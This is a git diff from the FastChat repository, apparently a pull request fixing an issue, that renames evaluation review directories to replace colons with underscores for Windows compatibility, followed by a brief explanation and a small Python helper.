diff --git a/fastchat/eval/table/review/vicuna-13b:20230322-new-hp-fp16.jsonl/review_alpaca-13b_vicuna-13b:20230322-new-hp-fp16.jsonl b/fastchat/eval/table/review/vicuna-13b_20230322-new-hp-fp16/review_alpaca-13b_vicuna-13b:20230322-new-hp-fp16.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-13b:20230322-new-hp-fp16.jsonl/review_alpaca-13b_vicuna-13b:20230322-new-hp-fp16.jsonl
rename to fastchat/eval/table/review/vicuna-13b_20230322-new-hp-fp16/review_alpaca-13b_vicuna-13b:20230322-new-hp-fp16.jsonl
diff --git a/fastchat/eval/table/review/vicuna-13b:20230322-new-hp-fp16.jsonl/review_bard_vicuna-13b:20230322-new-hp-fp16.jsonl b/fastchat/eval/table/review/vicuna-13b_20230322-new-hp-fp16/review_bard_vicuna-13b:20230322-new-hp-fp16.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-13b:20230322-new-hp-fp16.jsonl/review_bard_vicuna-13b:20230322-new-hp-fp16.jsonl
rename to fastchat/eval/table/review/vicuna-13b_20230322-new-hp-fp16/review_bard_vicuna-13b:20230322-new-hp-fp16.jsonl
diff --git a/fastchat/eval/table/review/vicuna-13b:20230322-new-hp-fp16.jsonl/review_gpt35_vicuna-13b:20230322-new-hp-fp16.jsonl b/fastchat/eval/table/review/vicuna-13b_20230322-new-hp-fp16/review_gpt35_vicuna-13b:20230322-new-hp-fp16.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-13b:20230322-new-hp-fp16.jsonl/review_gpt35_vicuna-13b:20230322-new-hp-fp16.jsonl
rename to fastchat/eval/table/review/vicuna-13b_20230322-new-hp-fp16/review_gpt35_vicuna-13b:20230322-new-hp-fp16.jsonl
diff --git a/fastchat/eval/table/review/vicuna-13b:20230322-new-hp-fp16.jsonl/review_llama_vicuna-13b:20230322-new-hp-fp16.jsonl b/fastchat/eval/table/review/vicuna-13b_20230322-new-hp-fp16/review_llama_vicuna-13b:20230322-new-hp-fp16.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-13b:20230322-new-hp-fp16.jsonl/review_llama_vicuna-13b:20230322-new-hp-fp16.jsonl
rename to fastchat/eval/table/review/vicuna-13b_20230322-new-hp-fp16/review_llama_vicuna-13b:20230322-new-hp-fp16.jsonl
diff --git a/fastchat/eval/table/review/vicuna-7b:20230322-fp16/review_alpaca-13b_vicuna-7b.jsonl b/fastchat/eval/table/review/vicuna-7b_20230322-fp16/review_alpaca-13b_vicuna-7b.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-7b:20230322-fp16/review_alpaca-13b_vicuna-7b.jsonl
rename to fastchat/eval/table/review/vicuna-7b_20230322-fp16/review_alpaca-13b_vicuna-7b.jsonl
diff --git a/fastchat/eval/table/review/vicuna-7b:20230322-fp16/review_bard_vicuna-7b.jsonl b/fastchat/eval/table/review/vicuna-7b_20230322-fp16/review_bard_vicuna-7b.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-7b:20230322-fp16/review_bard_vicuna-7b.jsonl
rename to fastchat/eval/table/review/vicuna-7b_20230322-fp16/review_bard_vicuna-7b.jsonl
diff --git a/fastchat/eval/table/review/vicuna-7b:20230322-fp16/review_gpt35_vicuna-7b.jsonl b/fastchat/eval/table/review/vicuna-7b_20230322-fp16/review_gpt35_vicuna-7b.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-7b:20230322-fp16/review_gpt35_vicuna-7b.jsonl
rename to fastchat/eval/table/review/vicuna-7b_20230322-fp16/review_gpt35_vicuna-7b.jsonl
diff --git a/fastchat/eval/table/review/vicuna-7b:20230322-fp16/review_llama_vicuna-7b.jsonl b/fastchat/eval/table/review/vicuna-7b_20230322-fp16/review_llama_vicuna-7b.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-7b:20230322-fp16/review_llama_vicuna-7b.jsonl
rename to fastchat/eval/table/review/vicuna-7b_20230322-fp16/review_llama_vicuna-7b.jsonl
| Fix https://github.com/lm-sys/FastChat/issues/241. | https://api.github.com/repos/lm-sys/FastChat/pulls/260 | 2023-04-07T00:26:20Z | 2023-04-07T00:29:14Z | 2023-04-07T00:29:14Z | 2023-04-07T00:29:17Z | 2,033 | lm-sys/FastChat | 41,733 |
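The renames above replace `:` with `_` in the evaluation directory names (e.g. `vicuna-13b:20230322-clean-lang` → `vicuna-13b_20230322-clean-lang`), since colons are reserved characters in Windows file names. A minimal sketch of that sanitization — `sanitize_model_id` is a hypothetical helper, not a function from the FastChat codebase:

```python
def sanitize_model_id(name):
    # Colons are not allowed in Windows paths (they are reserved for drive
    # letters), so replace them with underscores, matching the directory
    # renames in the diff above.
    return name.replace(":", "_")


print(sanitize_model_id("vicuna-13b:20230322-clean-lang"))
# vicuna-13b_20230322-clean-lang
```

Note the diff only renames directories; the `.jsonl` file names inside them still contain colons, so the same substitution would be needed there for a fully Windows-safe layout.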